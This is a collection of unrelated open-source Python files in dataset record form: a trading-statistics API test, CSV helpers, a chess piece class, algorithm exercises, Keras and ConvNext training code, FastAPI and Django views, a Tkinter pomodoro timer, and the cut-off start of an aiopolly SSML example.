try:\r\n            statstic = json.loads(statsticData.text)[\"data\"]\r\n            topTable.add_row([\"预期结果\",userID,accountIndex,factorProfitEquity,rateProfit,moneyFollowSum,profitFollowSum])\r\n            topTable.add_row([\"实际结果\",userID,accountIndex,statstic[\"ProfitFactor\"],statstic[\"ROI\"],statstic[\"AmountFollowing\"],statstic[\"FollowAllProfits\"]])\r\n            # The statistics are not real-time, so actual results may deviate; the assertion passes if expected and actual differ by at most DELTA\r\n            self.assertAlmostEqual(factorProfitEquity,float(statstic[\"ProfitFactor\"]),delta = 2)\r\n            self.assertAlmostEqual(rateProfit,float(statstic[\"ROI\"]),delta = 100)\r\n            # self.assertAlmostEqual(moneyFollowSum,float(statstic[\"AmountFollowing\"]),delta = 1000000)\r\n            # self.assertAlmostEqual(profitFollowSum,float(statstic[\"FollowAllProfits\"]),delta = 1000000)\r\n        finally:\r\n            topTable.reversesort = True\r\n            print(topTable)\r\n\r\n        orderProfitClose = Statistic.orderProfitClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n        moneyProfitCloseMean = Statistic.moneyProfitCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n        pointLossCloseMax = Statistic.pointLossCloseMax(mt4Account=mt4Account,brokerID=BrokerId)\r\n        tradePipsSum = Statistic.tradePipsSum(mt4Account=mt4Account,brokerID=BrokerId)\r\n        moneyCloseMean = Statistic.moneyCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n        sharpeRatio = Statistic.sharpeRatio(mt4Account=mt4Account,brokerID=BrokerId)\r\n        # Get the first column of the trade overview data\r\n        oneColumn = PrettyTable([\"预期/实际\",\"ME指(废弃,未计算)\",\"盈利交易\",\"平均盈利\",\"最大亏损点数\",\"盈亏点数\",\"预期回报\",\"夏普比率\"])\r\n        try:\r\n            statstic = json.loads(statsticData.text)[\"data\"]\r\n            oneColumn.add_row([\"预期结果\",statstic[\"FollowmeIndex\"],orderProfitClose,moneyProfitCloseMean,pointLossCloseMax,tradePipsSum,moneyCloseMean,sharpeRatio])\r\n            oneColumn.add_row([\"实际结果\",statstic[\"FollowmeIndex\"],statstic[\"WinOrders\"],statstic[\"AverageProfit\"],statstic[\"MinPoint\"],statstic[\"Point\"],statstic[\"ExpectedReturn\"],statstic[\"Sharpe\"]])\r\n            # The statistics are not real-time, so actual results may deviate; the assertion passes if expected and actual differ by at most DELTA\r\n            self.assertAlmostEqual(orderProfitClose,float(statstic[\"WinOrders\"]),delta = 200)\r\n            
self.assertAlmostEqual(moneyProfitCloseMean,float(statstic[\"AverageProfit\"]),delta = 100)\r\n            self.assertAlmostEqual(pointLossCloseMax,float(statstic[\"MinPoint\"]),delta = 1000000)\r\n            self.assertAlmostEqual(tradePipsSum,float(statstic[\"Point\"]),delta = 1000000)\r\n            self.assertAlmostEqual(moneyCloseMean,float(statstic[\"ExpectedReturn\"]),delta = 1000000)\r\n            self.assertAlmostEqual(sharpeRatio,float(statstic[\"Sharpe\"]),delta = 1000000)\r\n        finally:\r\n            oneColumn.reversesort = True\r\n            print(oneColumn)\r\n\r\n        orderClose = Statistic.orderClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n        orderProfitLongClose = Statistic.orderProfitLongClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n        moneyLossCloseMean = Statistic.moneyLossCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n        pointProfitCloseMean = Statistic.pointProfitCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n        timePossessionAll = Statistic.timePossessionAll(mt4Account=mt4Account,brokerID=BrokerId)\r\n        standardDeviation = Statistic.standardDeviation(mt4Account=mt4Account,brokerID=BrokerId)\r\n        reTraceMent = Statistic.reTraceMent(mt4Account=mt4Account,brokerID=BrokerId)\r\n        # Get the second column of the trade overview data\r\n        twoColumn = PrettyTable([\"预期/实际\",\"交易笔数\",\"做多盈利交易\",\"平均亏损\",\"平均盈利点数\",\"平均持仓时间\",\"标准差\",\"最大回撤\"])\r\n        try:\r\n            statstic = json.loads(statsticData.text)[\"data\"]\r\n            twoColumn.add_row([\"预期结果\",orderClose,orderProfitLongClose,moneyLossCloseMean,pointProfitCloseMean,str(timePossessionAll)+'分钟',standardDeviation,reTraceMent])\r\n            twoColumn.add_row([\"实际结果\",statstic[\"Orders\"],statstic[\"WinAndBuyOrders\"],statstic[\"AverageLoss\"],statstic[\"AVGWinPoint\"],str(statstic[\"VHour\"])+'小时'+str(statstic[\"VMinue\"])+'分钟',statstic[\"StandardDeviation\"],statstic[\"VRetracement\"]])\r\n            # The statistics are not real-time, so actual results may deviate; the assertion passes if expected and actual differ by at most DELTA\r\n            self.assertAlmostEqual(orderClose,float(statstic[\"Orders\"]),delta = 200)\r\n            self.assertAlmostEqual(orderProfitLongClose,float(statstic[\"WinAndBuyOrders\"]),delta = 100)\r\n            self.assertAlmostEqual(moneyLossCloseMean,float(statstic[\"AverageLoss\"]),delta = 1000000)\r\n            self.assertAlmostEqual(pointProfitCloseMean,float(statstic[\"AVGWinPoint\"]),delta = 1000000)\r\n            self.assertAlmostEqual(timePossessionAll,float(statstic[\"VHour\"]*60+statstic[\"VMinue\"]),delta = 1000000)\r\n            self.assertAlmostEqual(standardDeviation,float(statstic[\"StandardDeviation\"]),delta = 1000000)\r\n            self.assertAlmostEqual(reTraceMent,float(statstic[\"VRetracement\"]),delta = 1000000)\r\n        finally:\r\n            twoColumn.reversesort = True\r\n            print(twoColumn)\r\n\r\n        orderLossClose = Statistic.orderLossClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n        orderProfitShortClose = Statistic.orderProfitShortClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n        pointProfitCloseMax = Statistic.pointProfitCloseMax(mt4Account=mt4Account,brokerID=BrokerId)\r\n        pointLossCloseMean = Statistic.pointLossCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n        pointOfCfClose = Statistic.pointOfCfClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n        activity = Statistic.activity(mt4Account=mt4Account,brokerID=BrokerId)\r\n        # Get the third column of the trade overview data\r\n        threeColumn = PrettyTable([\"预期/实际\",\"亏损交易\",\"做空盈利交易\",\"最大盈利点数\",\"平均亏损点数\",\"跟随获利点数\",\"活跃度\"])\r\n        try:\r\n            statstic = json.loads(statsticData.text)[\"data\"]\r\n            threeColumn.add_row([\"预期结果\",orderLossClose,orderProfitShortClose,pointProfitCloseMax,pointLossCloseMean,pointOfCfClose,activity])\r\n            
threeColumn.add_row([\"实际结果\",statstic[\"LoseOrders\"],statstic[\"WinAndSellOrders\"],statstic[\"MaxPoint\"],statstic[\"AVGLosePoint\"],statstic[\"FollowPoint\"],statstic[\"VHour\"]])\r\n            # The statistics are not real-time, so actual results may deviate; the assertion passes if expected and actual differ by at most DELTA\r\n            self.assertAlmostEqual(orderLossClose,float(statstic[\"LoseOrders\"]),delta = 200)\r\n            self.assertAlmostEqual(orderProfitShortClose,float(statstic[\"WinAndSellOrders\"]),delta = 100)\r\n            self.assertAlmostEqual(pointProfitCloseMax,float(statstic[\"MaxPoint\"]),delta = 1000000)\r\n            self.assertAlmostEqual(pointLossCloseMean,float(statstic[\"AVGLosePoint\"]),delta = 1000000)\r\n            self.assertAlmostEqual(pointOfCfClose,float(statstic[\"FollowPoint\"]),delta = 1000000)\r\n            self.assertAlmostEqual(activity,statstic[\"VHour\"],delta = 1000000)\r\n        finally:\r\n            threeColumn.reversesort = True\r\n            print(threeColumn)\r\n\r\n    def tearDown(self):\r\n        # Clean up the test environment and restore the test data\r\n        # Log out of the followme system\r\n        pass\r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n\r\n","repo_name":"cccthon/webApiTest","sub_path":"test/statistics/WEB_mssql/FM_getStatisticsOfTrader.py","file_name":"FM_getStatisticsOfTrader.py","file_ext":"py","file_size_in_byte":10042,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}
{"seq_id":"24393604554","text":"import csv\n\n\ndef load_csv(csvpath):\n\n    with open(csvpath, 'r') as csvfile:\n        data = []\n\n        csvreader = csv.reader(csvfile, delimiter=',')\n        next(csvreader)  # Skip the CSV header\n\n        for row in csvreader:  # Read the CSV data\n            data.append(row)\n    return data\n\n\ndef save_csv(csvpath, data, header=None):\n\n    with open(csvpath, 'w', newline=\"\") as csvfile:\n        csvwriter = csv.writer(csvfile, delimiter=',')\n\n        if header:\n            csvwriter.writerow(header)\n        csvwriter.writerows(data)\n","repo_name":"AngelR0/Loan_Qualifier","sub_path":"qualifier/utils/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"38774844895","text":"from src import *\n\n\nclass Piece:\n    \"\"\"\n    Chess piece\n    \"\"\"\n\n    # TODO: verify that color, state and name are valid\n    def __init__(self, name=None, is_white=None, state=None, square=None):\n        self.name = name\n        self.is_white = is_white\n        self.state = state\n        self.square = square\n        self.valid_squares = self.compute_valid_squares()\n        self.attack_squares = self.compute_attack_squares()\n\n        color = \"w\" if is_white else \"b\"\n        self.sprite = PieceSprite(self.square.x, self.square.y, self.name + color)\n\n    def __str__(self):\n        if (self.name is not None) and (self.is_white is not None):\n            return self.name + (\"w\" if self.is_white else \"b\")\n        else:\n            return ' '\n\n    def __repr__(self):\n        color = \"w\" if self.is_white else \"b\"\n        return \" \".join([self.name, color, str(self.state), str(self.square)])\n\n    def change_square(self, new_square):\n        self.square = new_square\n        self.sprite.set_square(new_square.x, new_square.y)\n        self.valid_squares = self.compute_valid_squares()  # Update new valid individual squares\n        self.attack_squares = self.compute_attack_squares()  # Update new valid attack squares\n\n    def compute_valid_squares(self):\n        \"\"\"\n        Compute all valid squares for the current piece as if it were alone in the board.\n        :return: Dictionary with key = directions and values = list of valid squares\n        \"\"\"\n        types = {'R': Piece.valid_rook, 'B': Piece.valid_bishop, 'N': Piece.valid_knight,\n                 'Q': Piece.valid_queen, 'K': Piece.valid_king, 'P': Piece.valid_pawn}\n\n        
def select_function(function, piece):\n return function(piece)\n\n return select_function(types.get(self.name), self)\n\n def compute_attack_squares(self):\n \"\"\"\n Compute squares that one piece can possibly attack to. Note: pawns attack different\n than the way they move\n :return: list of Squares\n \"\"\"\n\n if self.name == \"P\":\n direction = +1 if self.is_white else -1\n x1, y1 = self.square.values()\n s1, s2 = None, None\n if (-1 < x1 - 1 < 8) and (-1 < y1 + direction < 8):\n s1 = Square((x1 - 1, y1 + direction))\n if (-1 < x1 + 1 < 8) and (-1 < y1 + direction < 8):\n s2 = Square((x1 + 1, y1 + direction))\n\n attack_squares = {(1, direction): [s2], (-1, direction): [s1]}\n else:\n attack_squares = self.compute_valid_squares()\n\n return attack_squares\n\n @staticmethod\n def sort_valid_squares(square, valid_squares, valid_squares_sorted):\n \"\"\"\n Sort the valid squares according to their distance to the piece square.\n The sorting facilitates to filter the valid moves with respect to other pieces,\n yet this is done inside the Chess class.\n :param square: current square\n :param valid_squares: list of all valid squares\n :param valid_squares_sorted: Dictionary with the keys expected to be computed, and empty value lists to populate\n e.g.: For a rook, directions are (1,0), (0,1), (-1,0), (0,-1)\n :return: None\n \"\"\"\n\n x1, y1 = square.values()\n\n for v in valid_squares:\n x, y = v.values()\n dx = int((x - x1) / abs(x - x1)) if abs(x - x1) > 0 else 0\n dy = int((y - y1) / abs(y - y1)) if abs(y - y1) > 0 else 0\n valid_squares_sorted[(dx, dy)].append(v) # Populate dictionary\n\n # Sort valid squares with respect to the current square\n for direction, valid in valid_squares_sorted.items():\n if direction[0] < 0: # \"negative directions\" have inverse sorting\n reverse = True\n elif (direction[0] == 0) and (direction[1] < 0): # \"negative directions\" have inverse sorting\n reverse = True\n else:\n reverse = False\n\n valid_squares_sorted[direction] = sorted(valid_squares_sorted[direction], reverse=reverse)\n\n @staticmethod\n def valid_rook(piece):\n current_square = piece.square\n x1, y1 = piece.square.values()\n\n horizontal = {Square((x, y1)) for x in range(8)}\n vertical = {Square((x1, y)) for y in range(8)}\n valid_squares = sorted(horizontal ^ vertical) # symmetric difference\n\n valid_squares_sorted = {(1, 0): [], (0, 1): [], (-1, 0): [], (0, -1): []}\n\n Piece.sort_valid_squares(current_square, valid_squares, valid_squares_sorted)\n\n return valid_squares_sorted\n\n @staticmethod\n def valid_bishop(piece):\n current_square = piece.square\n\n x1, y1 = current_square.values()\n pos_diagonal = {Square((x, x - x1 + y1)) for x in range(8) if (-1 < x - x1 + y1 < 8)}\n neg_diagonal = {Square((x, -x + x1 + y1)) for x in range(8) if (-1 < -x + x1 + y1 < 8)}\n\n valid_squares = sorted(pos_diagonal ^ neg_diagonal) # symmetric difference\n\n valid_squares_sorted = {(1, 1): [], (-1, 1): [], (-1, -1): [], (1, -1): []}\n\n Piece.sort_valid_squares(current_square, valid_squares, valid_squares_sorted)\n\n return valid_squares_sorted\n\n @staticmethod\n def valid_knight(piece):\n current_square = piece.square\n x1, y1 = current_square.values()\n\n # Hard coding of the L movements of a knight, i.e. 
2+1 or 1+2\n        valid_squares = []\n        for x, y in zip([2, 2, -2, -2, 1, 1, -1, -1], [1, -1, 1, -1, 2, -2, 2, -2]):\n            if (-1 < x1 + x < 8) and (-1 < y1 + y < 8):  # Select for within the board\n                valid_squares.append(Square((x1 + x, y1 + y)))\n\n        # No directional information is stored, since Knights can jump over pieces\n        valid_squares_sorted = {(0, 0): valid_squares}\n\n        return valid_squares_sorted\n\n    @staticmethod\n    def valid_queen(piece):\n        return {**Piece.valid_rook(piece), **Piece.valid_bishop(piece)}  # Queen moves as this combination\n\n    @staticmethod\n    def valid_king(piece):\n        current_square = piece.square\n        x1, y1 = current_square.values()\n\n        valid_squares = []\n        for x, y in zip([-1, -1, -1, 0, 0, 1, 1, 1], [1, 0, -1, 1, -1, 1, 0, -1]):  # hard code all valid moves\n            if (-1 < x1 + x < 8) and (-1 < y1 + y < 8):  # Select for within the board\n                valid_squares.append(Square((x1 + x, y1 + y)))\n\n        valid_squares_sorted = {(1, 1): [], (-1, 1): [], (-1, -1): [], (1, -1): [],\n                                (1, 0): [], (0, 1): [], (-1, 0): [], (0, -1): []}\n\n        Piece.sort_valid_squares(current_square, valid_squares, valid_squares_sorted)\n\n        return valid_squares_sorted\n\n    @staticmethod\n    def valid_pawn(piece):\n        current_square = piece.square\n        x1, y1 = current_square.values()\n\n        steps = 2 if current_square.y in [1, 6] else 1  # Starting pawns can jump 1 or 2 squares\n\n        direction = +1 if piece.is_white else -1  # Black pawns move downwards, white pawns move upwards\n\n        valid_squares = [Square((x1, y1 + direction * step)) for step in range(1, steps + 1) if\n                         (-1 < y1 + direction * step < 8)]\n\n        valid_squares_sorted = {(0, direction): []}\n\n        Piece.sort_valid_squares(current_square, valid_squares, valid_squares_sorted)\n\n        return valid_squares_sorted\n\n\nif __name__ == \"__main__\":\n    print(\"piece_ module\")\n","repo_name":"johnrest/pychess","sub_path":"src/piece_.py","file_name":"piece_.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"11954318143","text":"'''\nhttps://www.acmicpc.net/problem/1535\n'''\n\nn = int(input()) # number of people\n\nstemina = [0] + list(map(int, input().split())) # stamina consumed\nhappy = [0] + list(map(int, input().split())) # happiness gained\n\ndp = [[0] * 101 for _ in range(n+1)]\n\n\nfor i in range(1, n+1):\n    for j in range(1, 101):\n        if stemina[i] <= j:\n            dp[i][j] = max(dp[i-1][j], dp[i-1][j - stemina[i]] + happy[i])\n        else:\n            dp[i][j] = dp[i-1][j]\n\nprint(dp[n][99])","repo_name":"gogongkong/Python_Study","sub_path":"Month_07/Wk27/0709/백준_1535번_냅색_안녕_S2.py","file_name":"백준_1535번_냅색_안녕_S2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}
{"seq_id":"18349669518","text":"import tensorflow as tf\r\nfrom keras_preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Convolution2D, MaxPooling2D,Activation, Dropout, Flatten, Dense\r\nfrom tensorflow.keras.optimizers import Adam\r\n\r\n# Learning rate; too high or too low may prevent convergence\r\nlearningRate = 0.0015\r\n# Steps per epoch during training\r\nstepsPerEpoch = 512\r\n# Number of epochs\r\nepoch = 64\r\n# Dropout parameter against overfitting; too high causes underfitting\r\ndropoutRate = 0.05\r\n# Random horizontal shift fraction for the training set\r\nwidthShiftRange = 0.02\r\n# Random vertical shift fraction for the training set (trailing comma removed: it made this a 1-tuple)\r\nheightShiftRange = 0.02\r\n# Random zoom fraction along X and Y\r\nzoomRange = 0.08\r\n# Random shear fraction (X shifted in proportion to Y)\r\nshearRange = 0.12\r\n\r\nstdSize = (40, 32)\r\n\r\n\r\ndef getClassesDict():\r\n    return 
ImageDataGenerator().flow_from_directory(directory='./dataset/').class_indices\r\n\r\n\r\ndef train():\r\n trainDataGen = ImageDataGenerator(\r\n rotation_range=15,\r\n shear_range=shearRange,\r\n zoom_range=zoomRange,\r\n rescale=1 / 255,\r\n width_shift_range=widthShiftRange,\r\n height_shift_range=heightShiftRange,\r\n fill_mode='nearest'\r\n )\r\n trainGenerator = trainDataGen.flow_from_directory(\r\n directory='./dataset/',\r\n target_size=stdSize,\r\n color_mode=\"grayscale\",\r\n batch_size=10,\r\n )\r\n print(trainGenerator.class_indices)\r\n\r\n validDataGen = ImageDataGenerator(\r\n rotation_range=15,\r\n shear_range=shearRange,\r\n zoom_range=zoomRange,\r\n rescale=1 / 255,\r\n width_shift_range=widthShiftRange,\r\n height_shift_range=heightShiftRange,\r\n fill_mode='nearest'\r\n )\r\n validDataGenerator = validDataGen.flow_from_directory(\r\n directory='./valid/',\r\n target_size=stdSize,\r\n color_mode=\"grayscale\",\r\n batch_size=10,\r\n )\r\n\r\n model = Sequential()\r\n\r\n model.add(Convolution2D(16, (5, 5), input_shape=(40, 32, 1)))\r\n model.add(MaxPooling2D(2, 2))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Convolution2D(32, (5, 5)))\r\n model.add(MaxPooling2D(2, 2))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Flatten())\r\n\r\n model.add(Dense(42))\r\n model.add(Activation('relu'))\r\n model.add(Dropout(dropoutRate))\r\n model.add(Dense(42))\r\n model.add(Activation('sigmoid'))\r\n\r\n adam = Adam(lr=learningRate)\r\n model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy'])\r\n model.fit(\r\n trainGenerator,\r\n steps_per_epoch=stepsPerEpoch,\r\n epochs=epoch,\r\n validation_data=validDataGenerator,\r\n )\r\n\r\n model.save('./model.h5')\r\n\r\n info = 'Graduation Project ShuangJiang Du.\\n'\r\n info += 'Thanks MSRMZNM ANEKI ,ICG ANEKI for help.\\n'\r\n info += 'Using TensorFlow Version' + tf.__version__ + '.\\n'\r\n info += 'Save model as model.h5.\\n'\r\n print(info)\r\n","repo_name":"7a6bb3ef3/graduation","sub_path":"keras/snnn.py","file_name":"snnn.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73362515354","text":"from fastapi import APIRouter\n\n\nrouter = APIRouter()\n\n\n@router.get(\"/hello_world\")\nasync def hello_world() -> str:\n return \"Hello world!\"\n\n\n@router.get(\"/hello/{name}\")\nasync def hello_person(name: str) -> str:\n return f\"Hello {name}! 
I hope you're doing well.\"\n","repo_name":"crockeo/chaos","sub_path":"fixtures/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}
{"seq_id":"74067330394","text":"from typing import List\n\n\nclass Solution:\n\n    def s(self, nums, left, right, target):\n        if right - left == 1:\n            if nums[right] == target:\n                return True\n            if nums[left] == target:\n                return True\n            return False\n\n        mid = int((left + right) / 2)\n        if nums[mid] == target:\n            return True\n\n        while nums[left] == nums[mid] == nums[right] and right - left > 1:\n            right -= 1\n            mid = int((left + right) / 2)\n            if nums[mid] == target:\n                return True\n\n        if nums[right] <= nums[left] <= nums[mid]:\n            if nums[left] <= target <= nums[mid]:\n                return self.s(nums, left, mid, target)\n            else:\n                return self.s(nums, mid, right, target)\n        if nums[mid] <= nums[right] <= nums[left]:\n            if nums[mid] <= target <= nums[right]:\n                return self.s(nums, mid, right, target)\n            else:\n                return self.s(nums, left, mid, target)\n\n        if nums[left] <= nums[mid] <= nums[right]:\n            if nums[left] <= target <= nums[mid]:\n                return self.s(nums, left, mid, target)\n            else:\n                return self.s(nums, mid, right, target)\n\n    def search(self, nums: List[int], target: int) -> bool:\n        if len(nums) == 0:\n            return False\n        if len(nums) == 1:\n            if nums[0] == target:\n                return True\n            else:\n                return False\n        return self.s(nums, 0, len(nums) - 1, target)","repo_name":"Cjz-Y/shuati","sub_path":"leetcode/81.py","file_name":"81.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"7614906982","text":"import math\nfrom functools import partial\nfrom tkinter import *\n\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\n\nreps = 0\ntimer = None\n# ---------------------------- TIMER RESET ------------------------------- #\n\ndef reset_timer():\n    global reps, timer\n    # Stop previous countdown\n    reps = 0\n    timer_label.config(text=\"TIMER\", fg=GREEN)\n    # Reset to the working time text\n    canvas.itemconfig(timer_text, text=f'{WORK_MIN}:00')\n    check_marks.config(text=\"\")\n    window.after_cancel(timer)\n\n# ---------------------------- TIMER MECHANISM ------------------------------- #\n\ndef start_timer():\n    global reps\n    reps += 1\n    work_sec = WORK_MIN * 60\n    short_break_sec = SHORT_BREAK_MIN * 60\n    long_break_sec = LONG_BREAK_MIN * 60\n    # check the long-break case first: every 8th rep is also even, so the % 2 test must come after it\n    if reps % 8 == 0:\n        timer_label.config(text=\"Long break\", fg=RED)\n        count_down(long_break_sec)\n    elif reps % 2 == 0:\n        timer_label.config(text=\"Short break\", fg=PINK, bg=YELLOW)\n        count_down(short_break_sec)\n    else:\n        timer_label.config(text=\"Work\", fg=GREEN)\n        count_down(work_sec)\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #\n\ndef count_down(count):\n    global reps, timer\n    count_minutes = math.floor(count / 60)\n    count_seconds = count % 60\n    canvas.itemconfig(timer_text, text=f'{str(count_minutes).zfill(2)}:{str(count_seconds).zfill(2)}')\n    if count > 0:\n        timer = window.after(1000, count_down, count - 1)\n    else:\n        start_timer()\n        mark = \"\"\n        work_sessions = math.floor(reps/2)\n        for _ in range(work_sessions):\n            mark += \"✔\"\n        check_marks.config(text=mark)\n# ---------------------------- UI SETUP 
------------------------------- #\n\nwindow = Tk()\nwindow.title(\"Pomodoro\")\n# padding the view so that the window is larger than the image itself\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\ntimer_label = Label(text=\"Timer\", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 40, \"bold\"))\ntimer_label.grid(column=1, row=0)\n\n# Things can be layered on the canvas\ncanvas = Canvas(width=360, height=360, bg=YELLOW, highlightthickness=0)\n\nmain_image = PhotoImage(file=\"tomato.png\")\n# Centering the image by putting it in half of width and half of height\ncanvas.create_image(180, 180, image=main_image)\n\ntimer_text = canvas.create_text(180, 180, text=f'{WORK_MIN}:00', fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncanvas.grid(column=1, row=1)\n\nstart_button = Button(text=\"Start\", highlightthickness=0, highlightbackground= YELLOW, command=partial(start_timer))\nstart_button.grid(column=0, row=2)\n\nreset_button = Button(text=\"Reset\", highlightthickness=0, highlightbackground=YELLOW, command=reset_timer)\nreset_button.grid(column=2, row=2)\n\ncheck_marks = Label(fg=GREEN, bg=YELLOW)\ncheck_marks.grid(column=1, row=3)\n\nwindow.mainloop()\n","repo_name":"aintzevi/100-Days-of-Code-using-Python","sub_path":"day-28/pomodoro.py","file_name":"pomodoro.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22617946199","text":"import torchvision.models as models\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom transformers import ConvNextModel\n\nclass BaseModel(nn.Module):\n def __init__(self, num_classes=10):\n super(BaseModel, self).__init__()\n \n self.model = ConvNextModel.from_pretrained(\"facebook/convnext-base-224\")\n \n #self.classifier = Classifier(num_classes)\n\n self.A_classifier = nn.Linear(1024, num_classes)\n self.B_classifier = nn.Linear(1024, num_classes)\n self.C_classifier = nn.Linear(1024, num_classes)\n self.D_classifier = nn.Linear(1024, num_classes)\n self.E_classifier = nn.Linear(1024, num_classes)\n self.F_classifier = nn.Linear(1024, num_classes)\n self.G_classifier = nn.Linear(1024, num_classes)\n self.H_classifier = nn.Linear(1024, num_classes)\n self.I_classifier = nn.Linear(1024, num_classes)\n self.J_classifier = nn.Linear(1024, num_classes)\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, x):\n x = self.model(**x)\n x = x.pooler_output\n\n A_result = self.A_classifier(x)\n #A_result = F.softmax(A_result)\n\n B_result = self.B_classifier(x)\n #B_result = F.softmax(B_result)\n\n C_result = self.C_classifier(x)\n #C_result = F.softmax(C_result)\n\n D_result = self.D_classifier(x)\n #D_result = F.softmax(D_result)\n\n E_result = self.E_classifier(x)\n #E_result = F.softmax(E_result)\n\n F_result = self.F_classifier(x)\n #F_result = F.softmax(F_result)\n\n G_result = self.G_classifier(x)\n #G_result = F.softmax(G_result)\n\n H_result = self.H_classifier(x)\n #H_result = F.softmax(H_result)\n\n I_result = self.I_classifier(x)\n #I_result = F.softmax(I_result)\n\n J_result = self.J_classifier(x)\n #J_result = F.softmax(J_result)\n\n\n #x = F.sigmoid(self.classifier2(x))\n #return x\n\n return [A_result,B_result,C_result,D_result,E_result,F_result,G_result,H_result,I_result,J_result]\n\n\n\nclass Classifier(nn.Module):\n\n def __init__(self,num_classes):\n super(Classifier, self).__init__()\n\n self.classifier1 = nn.Linear(1024,512)\n self.classifier2 = nn.Linear(512,num_classes)\n self.relu = nn.ReLU()\n\n\n def forward(self, x):\n x = 
self.relu(self.classifier1(x)) \n x = self.classifier2(x) \n\n return x","repo_name":"blendlee/Block-Classification","sub_path":"MTL/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70953585115","text":"from django.shortcuts import render, get_object_or_404, get_list_or_404, redirect\nfrom blog.models import YazilarModel, YorumModel\nfrom blog.forms import YorumEkleModelForm, yorum_ekle\nfrom django.views import View\nimport logging\n\nlogger = logging.getLogger('konu_okuma')\n\nclass DetayView(View):\n http_method_names = ['get', 'post']\n yorum_ekle_form = YorumEkleModelForm\n\n def get(self, request, slug):\n yazi = get_object_or_404(YazilarModel, slug=slug)\n logger.info('konu okundu: ' + request.user.username + \" \" + yazi.baslik )\n yorumlar = yazi.yorumlar.order_by('-id').filter(parent=None)\n yazi.bakis_sayi +=1\n yazi.save()\n\n context = {\n 'yazi' : yazi,\n 'yorumlar' : yorumlar,\n 'yorum_sayi' : len(yazi.yorumlar.all()),\n 'yorum_ekle_form' : self.yorum_ekle_form,\n }\n\n return render(request, 'pages/detay.html', context)\n\n def post(self, request, slug):\n yazi = get_object_or_404(YazilarModel, slug=slug)\n yorum_ekle_form = self.yorum_ekle_form(request.POST)\n if yorum_ekle_form.is_valid():\n yorum = yorum_ekle_form.save(commit=False)\n yorum.yazan = request.user\n yorum.yazi = yazi\n if request.POST.get('answer') != 'A':\n yorum.parent = get_object_or_404(YorumModel, id=request.POST.get('answer'))\n yorum.save()\n return redirect('detay', slug=yazi.slug)\n\n","repo_name":"adamorujov/djproject1","sub_path":"blog/views/detay.py","file_name":"detay.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20025396950","text":"import asyncio\n\nfrom aiopolly import Polly\nfrom aiopolly.types import AudioFormat, VoiceID, TextType\nfrom aiopolly.types import LanguageCode\nfrom aiopolly.utils.ssml import ssml_text, prosody, emphasis, pause, lang, paragraph, phoneme, sentence\nfrom aiopolly.utils.ssml.params import Level, Volume, Pitch, Alphabet, Rate, Strength\n\nwith_pause = f'Mary had a little lamb {pause(seconds=3)}Whose fleece was white as snow.'\n\nwith_emphasis = f'I already told you I {emphasis(\"really like\", level=Level.strong)} that person.'\n\nwith_foreign_text = lang('Je ne parle pas français', language_code=LanguageCode.fr_FR)\n\nparagraphs = paragraph('This is the first paragraph. There should be a pause after this text is spoken.',\n 'This is the second paragraph')\n\nwith_phonemes = (f'You say, {phoneme(\"pecan\", alphabet=Alphabet.ipa, ph=\"pɪˈkɑːn\")}. 
